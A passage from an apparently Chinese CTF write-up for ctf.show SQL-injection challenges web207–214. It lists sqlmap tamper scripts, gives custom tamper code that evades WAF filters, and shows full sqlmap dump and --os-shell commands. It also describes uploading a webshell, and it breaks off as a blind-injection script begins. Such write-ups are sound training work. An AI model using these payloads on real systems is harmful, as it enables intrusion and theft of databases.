MaxDB绕过对 IFNULL 过滤</span><br><span class="line"></span><br><span class="line">space2mssqlblank.py mssql空格替换为其它空符号</span><br><span class="line"></span><br><span class="line">base64encode.py 用base64编码</span><br><span class="line"></span><br><span class="line">space2mssqlhash.py mssql查询中替换空格</span><br><span class="line"></span><br><span class="line">modsecurityversioned.py mysql中过滤空格，包含完整的查询版本注释</span><br><span class="line"></span><br><span class="line">space2mysqlblank.py mysql中空格替换其它空白符号</span><br><span class="line"></span><br><span class="line">between.py MS SQL 2005，MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号（&gt;）</span><br><span class="line"></span><br><span class="line">space2mysqldash.py MySQL，MSSQL替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）</span><br><span class="line"></span><br><span class="line">multiplespaces.py 围绕SQL关键字添加多个空格</span><br><span class="line"></span><br><span class="line">space2plus.py 用+替换空格</span><br><span class="line"></span><br><span class="line">bluecoat.py MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like</span><br><span class="line"></span><br><span class="line">nonrecursivereplacement.py 双重查询语句。取代predefined SQL关键字<span class="keyword">with</span>表示 suitable <span class="keyword">for</span>替代</span><br><span class="line"></span><br><span class="line">space2randomblank.py 代替空格字符（“”）从一个随机的空白字符可选字符的有效集</span><br><span class="line"></span><br><span class="line">sp_password.py 追加sp_password’从DBMS日志的自动模糊处理的<span class="number">26</span> 有效载荷的末尾</span><br><span class="line"></span><br><span class="line">chardoubleencode.py 双<span class="keyword">url</span>编码(不处理以编码的)</span><br><span class="line"></span><br><span class="line">unionalltounion.py 替换<span class="keyword">UNION</span> <span class="keyword">ALL</span> <span class="keyword">SELECT</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span></span><br><span class="line"></span><br><span class="line">charencode.py Microsoft <span class="keyword">SQL</span> <span class="keyword">Server</span> <span class="number">2005</span>，MySQL <span class="number">4</span>, <span class="number">5.0</span> <span class="keyword">and</span> <span class="number">5.5</span>，<span class="keyword">Oracle</span> <span class="number">10</span>g，PostgreSQL <span class="number">8.3</span>, <span class="number">8.4</span>, <span class="number">9.0</span><span class="keyword">url</span>编码；</span><br><span class="line"></span><br><span class="line">randomcase.py Microsoft <span class="keyword">SQL</span> <span class="keyword">Server</span> <span class="number">2005</span>，MySQL <span class="number">4</span>, <span class="number">5.0</span> <span class="keyword">and</span> <span class="number">5.5</span>，<span class="keyword">Oracle</span> <span class="number">10</span>g，PostgreSQL <span class="number">8.3</span>, <span class="number">8.4</span>, <span class="number">9.0</span>中随机大小写</span><br><span class="line"></span><br><span class="line">unmagicquotes.py 宽字符绕过 GPC addslashes</span><br><span class="line"></span><br><span class="line">randomcomments.py 用<span class="comment">/**/</span>分割<span class="keyword">sql</span>关键字</span><br><span class="line"></span><br><span class="line">charunicodeencode.py ASP，ASP.NET中字符串 <span class="keyword">unicode</span> 编码</span><br><span class="line"></span><br><span class="line">securesphere.py 追加特制的字符串</span><br><span class="line"></span><br><span class="line">versionedmorekeywords.py MySQL &gt;= <span class="number">5.1</span><span class="number">.13</span>注释绕过</span><br><span class="line"></span><br><span class="line">halfversionedmorekeywords.py MySQL &lt; <span class="number">5.1</span>中关键字前加注释</span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://a83c7e70-64d2-4dab-9232-8c5080415bd1.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://a83c7e70-64d2-4dab-9232-8c5080415bd1.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=mycomment -D ctfshow_web -T ctfshow_flaxca --dump</span></span><br></pre></td></tr></table></figure></div>

<p>根据原本的space2comment仿写了一个，将注释换成了<code>0x09</code></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Author:孤桜懶契</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.core.compat <span class="keyword">import</span> xrange</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> singleTimeWarnMessage</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> DBMS</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line">    singleTimeWarnMessage(<span class="string">"By孤桜懶契-空格替换制表符0x09"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line">    payload = space2comment(payload)</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">space2comment</span><span class="params">(payload)</span>:</span></span><br><span class="line">    retVal = payload</span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = <span class="string">""</span></span><br><span class="line">        quote, doublequote, firstspace = <span class="literal">False</span>, <span class="literal">False</span>, <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(len(payload)):</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> firstspace:</span><br><span class="line">                <span class="keyword">if</span> payload[i].isspace():</span><br><span class="line">                    firstspace = <span class="literal">True</span></span><br><span class="line">                    retVal += chr(<span class="number">0x09</span>)</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'\''</span>:</span><br><span class="line">                    quote = <span class="keyword">not</span> quote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'"'</span>:</span><br><span class="line">                    doublequote = <span class="keyword">not</span> doublequote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">" "</span> <span class="keyword">and</span> <span class="keyword">not</span> doublequote <span class="keyword">and</span> <span class="keyword">not</span> quote:</span><br><span class="line">                    retVal += chr(<span class="number">0x09</span>)</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            retVal += payload[i]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br></pre></td></tr></table></figure></div>

<h2 id="web208"><a href="#web208" class="headerlink" title="web208"></a>web208</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//对传入的参数进行了过滤</span><br><span class="line">// $id = str_replace('<span class="keyword">select</span><span class="string">', '', $id);</span></span><br><span class="line"><span class="string">  function waf($str)&#123;</span></span><br><span class="line"><span class="string">   return preg_match('</span>/ /<span class="string">', $str);</span></span><br><span class="line"><span class="string">  &#125;</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>只过滤了小写的select，sqlmap自己就会跑大写的</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://90811f8e-b2c5-4181-ac8a-2752c4d91c40.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://90811f8e-b2c5-4181-ac8a-2752c4d91c40.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=mycomment -D ctfshow_web -T ctfshow_flaxcac --dump</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web209"><a href="#web209" class="headerlink" title="web209"></a>web209</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//对传入的参数进行了过滤</span><br><span class="line">  function waf($str)&#123;</span><br><span class="line">   //TODO 未完工</span><br><span class="line">   return preg_match('/ |\*|\=/', $str);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p><strong>多过滤了*号和=号，我们在上面的脚本多加一个匹配=号换like</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;e83f1efc-354e-42c0-8c2e-ca9eafd2f81d.challenge.ctf.show:8080&#x2F;api&#x2F;index.php&quot; --referer&#x3D;&quot;ctf.show&quot; --batch --method&#x3D;&quot;PUT&quot; --data&#x3D;&quot;id&#x3D;1&quot; --headers&#x3D;&quot;Content-Type: text&#x2F;plain&quot; --threads&#x3D;10 --cookie&#x3D;&quot;PHPSESSID&#x3D;hnfvub4a2sfnmofk3g7r28vc39; ctfshow&#x3D;72a5a5bfd041b4dc7fac9cfa9f868db6&quot; --safe-url&#x3D;&quot;http:&#x2F;&#x2F;e83f1efc-354e-42c0-8c2e-ca9eafd2f81d.challenge.ctf.show:8080&#x2F;api&#x2F;getToken.php&quot; --safe-freq&#x3D;1 --tamper&#x3D;mycomment  -D ctfshow_web -T ctfshow_flav --dump</span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Author:孤桜懶契</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.core.compat <span class="keyword">import</span> xrange</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> singleTimeWarnMessage</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> DBMS</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line">    singleTimeWarnMessage(<span class="string">"By孤桜懶契-空格替换制表符0x09,=号换like"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line">    payload = space2comment(payload)</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">space2comment</span><span class="params">(payload)</span>:</span></span><br><span class="line">    retVal = payload</span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = <span class="string">""</span></span><br><span class="line">        quote, doublequote, firstspace = <span class="literal">False</span>, <span class="literal">False</span>, <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(len(payload)):</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> firstspace:</span><br><span class="line">                <span class="keyword">if</span> payload[i].isspace():</span><br><span class="line">                    firstspace = <span class="literal">True</span></span><br><span class="line">                    retVal += chr(<span class="number">0x09</span>)</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'\''</span>:</span><br><span class="line">                    quote = <span class="keyword">not</span> quote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'"'</span>:</span><br><span class="line">                    doublequote = <span class="keyword">not</span> doublequote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'='</span>:</span><br><span class="line">                    retVal += chr(<span class="number">0x09</span>) + <span class="string">'like'</span> + chr(<span class="number">0x09</span>)</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">"*"</span>:</span><br><span class="line">                retVal += chr(<span class="number">0x31</span>)</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">" "</span> <span class="keyword">and</span> <span class="keyword">not</span> doublequote <span class="keyword">and</span> <span class="keyword">not</span> quote:</span><br><span class="line">                    retVal += chr(<span class="number">0x09</span>)</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            retVal += payload[i]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br></pre></td></tr></table></figure></div>

<h2 id="web210"><a href="#web210" class="headerlink" title="web210"></a>web210</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;对查询字符进行解密</span><br><span class="line">  function decode($id)&#123;</span><br><span class="line">    return strrev(base64_decode(strrev(base64_decode($id))));</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>先对字符串进行64解码，然后再反转字符，再套一层，我们写个相反就的行了</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Author:孤桜懶契</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> singleTimeWarnMessage</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line">    singleTimeWarnMessage(<span class="string">"By孤桜懶契-base编码两次-反转两次"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line">    payload = encode(payload)</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encode</span><span class="params">(payload)</span>:</span></span><br><span class="line">    retVal = payload</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = retVal.replace(<span class="string">" "</span>,chr(<span class="number">0x09</span>))</span><br><span class="line">        retVal = retVal.encode()</span><br><span class="line">        retVal = retVal[::<span class="number">-1</span>]</span><br><span class="line">        retVal = base64.b64encode(retVal)</span><br><span class="line">        retVal = retVal[::<span class="number">-1</span>]</span><br><span class="line">        retVal = base64.b64encode(retVal)</span><br><span class="line">        retVal = retVal.decode()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br></pre></td></tr></table></figure></div>

<p>payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;6848c055-1297-4397-8dc0-d2477ea293db.challenge.ctf.show:8080&#x2F;api&#x2F;index.php&quot; --referer&#x3D;&quot;ctf.show&quot; --batch --method&#x3D;&quot;PUT&quot; --data&#x3D;&quot;id&#x3D;1&quot; --headers&#x3D;&quot;Content-Type: text&#x2F;plain&quot; --threads&#x3D;10 --cookie&#x3D;&quot;PHPSESSID&#x3D;hnfvub4a2sfnmofk3g7r28vc39; ctfshow&#x3D;72a5a5bfd041b4dc7fac9cfa9f868db6&quot; --safe-url&#x3D;&quot;http:&#x2F;&#x2F;6848c055-1297-4397-8dc0-d2477ea293db.challenge.ctf.show:8080&#x2F;api&#x2F;getToken.php&quot; --safe-freq&#x3D;1 --tamper&#x3D;my</span><br></pre></td></tr></table></figure></div>

<h2 id="web211"><a href="#web211" class="headerlink" title="web211"></a>web211</h2><blockquote>
<ul>
<li>和上题一样，过滤了空格号，不影响，我上个代码中写了替换空格为0x09也就是制表符</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://6848c055-1297-4397-8dc0-d2477ea293db.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://6848c055-1297-4397-8dc0-d2477ea293db.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=my -D ctfshow_web -T ctfshow_flavia --dump</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web212"><a href="#web212" class="headerlink" title="web212"></a>web212</h2><blockquote>
<ul>
<li>和上题一样过滤多加了个*不影响我们</li>
</ul>
</blockquote>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;2b123cfd-31cd-465e-b7cb-1e1470122ae4.challenge.ctf.show:8080&#x2F;api&#x2F;index.php&quot; --referer&#x3D;&quot;ctf.show&quot; --batch --method&#x3D;&quot;PUT&quot; --data&#x3D;&quot;id&#x3D;1&quot; --headers&#x3D;&quot;Content-Type: text&#x2F;plain&quot; --threads&#x3D;10 --cookie&#x3D;&quot;PHPSESSID&#x3D;hnfvub4a2sfnmofk3g7r28vc39; ctfshow&#x3D;72a5a5bfd041b4dc7fac9cfa9f868db6&quot; --safe-url&#x3D;&quot;http:&#x2F;&#x2F;2b123cfd-31cd-465e-b7cb-1e1470122ae4.challenge.ctf.show:8080&#x2F;api&#x2F;getToken.php&quot; --safe-freq&#x3D;1 --tamper&#x3D;my  -T ctfshow_web -T  ctfshow_flavis --dump</span><br></pre></td></tr></table></figure></div>

<h2 id="web213"><a href="#web213" class="headerlink" title="web213"></a>web213</h2><blockquote>
<ul>
<li>这题需要getshell，因为过滤的和上题一样，就用我那个过滤脚本</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Author:孤桜懶契</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> singleTimeWarnMessage</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line">    singleTimeWarnMessage(<span class="string">"By孤桜懶契-base编码两次-反转两次"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line">    payload = encode(payload)</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encode</span><span class="params">(payload)</span>:</span></span><br><span class="line">    retVal = payload</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = retVal.replace(<span class="string">" "</span>,chr(<span class="number">0x09</span>))</span><br><span class="line">        retVal = retVal.encode()</span><br><span class="line">        retVal = retVal[::<span class="number">-1</span>]</span><br><span class="line">        retVal = base64.b64encode(retVal)</span><br><span class="line">        retVal = retVal[::<span class="number">-1</span>]</span><br><span class="line">        retVal = base64.b64encode(retVal)</span><br><span class="line">        retVal = retVal.decode()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br></pre></td></tr></table></figure></div>

<p><strong>然后接着我们进行getshell上传一个上传点</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://6309ef18-4721-4f5c-919d-bf47c71c749e.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://6309ef18-4721-4f5c-919d-bf47c71c749e.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=my --os-shell</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731164027857.png" alt="image-20210731164027857"></p>
<p><strong>上传一句话木马，蚁剑连接</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731164139622.png" alt="image-20210731164139622"></p>
<p><strong>在根目录下有flag</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731164205840.png" alt="image-20210731164205840"></p>
<h2 id="web214"><a href="#web214" class="headerlink" title="web214"></a>web214</h2><blockquote>
<ul>
<li>时间盲注，直接脚本跑</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/31</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span 